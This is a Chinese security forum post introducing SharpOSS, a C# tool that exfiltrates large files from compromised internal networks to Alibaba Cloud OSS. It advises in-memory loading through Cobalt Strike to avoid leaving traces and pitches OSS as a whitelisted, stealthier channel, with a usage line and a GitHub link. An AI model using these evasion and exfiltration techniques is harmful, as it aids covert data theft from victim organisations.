安全矩阵

 找回密码
 立即注册
搜索
查看: 4442|回复: 0

SharpOSS-利用阿里云OSS实现内网渗透中的快速文件上传

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-10-4 19:42:39 | 显示全部楼层 |阅读模式
原文连接:SharpOSS-利用阿里云OSS实现内网渗透中的快速文件上传

内网需求“内网渗透的本质是信息收集”,常常会收集到一些体积较大的文件或者是源码进行分析利用。而网络情况复杂的情况下,通过菜刀一类webshell管理工具或CS一类C2工具来进行传输文件是非常慢的,所以经常会用到AliyunOSS来进行快速文件传输。同时aliyunOSS是白域名,比cs传输文件更为隐秘。就看了一下aliyun-oss-csharp-sdk实现了这个功能。
Usage建议可内存加载,尽量用cs的execute-assembly内存加载,做到尽可能的不落地。

  1. SharpOSS.exe
  2. Author: Uknow
  3. Github: https://github.com/uknowsec/SharpOSS
  4. Usage:  SharpOSS.exe bucketName accessKeyId accessKeySecret endpoint UploadFilePath
复制代码

github

https://github.com/uknowsec/SharpOSS

代码仅放出了主要部分,需要引用aliyun-oss-csharp-sdk。有兴趣的自行反编译exe。

关注公众号回复 SharpOSS 可直接获取下载地址。




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 07:43 , Processed in 0.012152 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表